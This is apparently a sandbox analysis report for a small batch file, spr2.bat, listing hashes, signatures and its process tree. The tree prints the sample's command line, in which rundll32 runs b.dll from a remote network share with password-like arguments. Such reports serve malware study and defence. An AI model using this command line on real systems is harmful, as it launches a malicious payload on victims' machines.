a7fe915517ec1fff09e9b59be27d2ab81c3bbb018c80583ea7ac94ce9185472a | Triage

Analysis

max time kernel
360s
max time network
432s
platform
windows10_x64
resource
win10v20201028
submitted
04-11-2020 18:14

Sharing

Report Analysis Logs

General

Target

spr2.bat
Size

99B
MD5

103653f5e19bc6d0e1fe3f9d22d15aca
SHA1

0c609be88e6ae892968066a078e624dfe1fbc798
SHA256

81c7ae979acbec699f975e928b68c3bbfc04fec8bdcac2d42c8f7e16c25eb137
SHA512

09562fc765a8c4fd8f25bbbe5f9e6ef2ce2e749f6900dc5c50e90ced794d57feb9102e0bcb5374c1e9034f25cbe920052b96d8ed942ee0098a7be10cfe40085b

Score

1^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

cmd.exe

description pid process target process

PID 1036 wrote to memory of 2652 1036 cmd.exe rundll32.exe
PID 1036 wrote to memory of 2652 1036 cmd.exe rundll32.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\spr2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\system32\rundll32.exe
rundll32.exe "\\SRV01QW\sp\b.dll",DllRegisterServer --passegregor10 --append="carraro" --multiproc
2⤵
PID:2652

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2652-0-0x0000000000000000-mapping.dmp

Download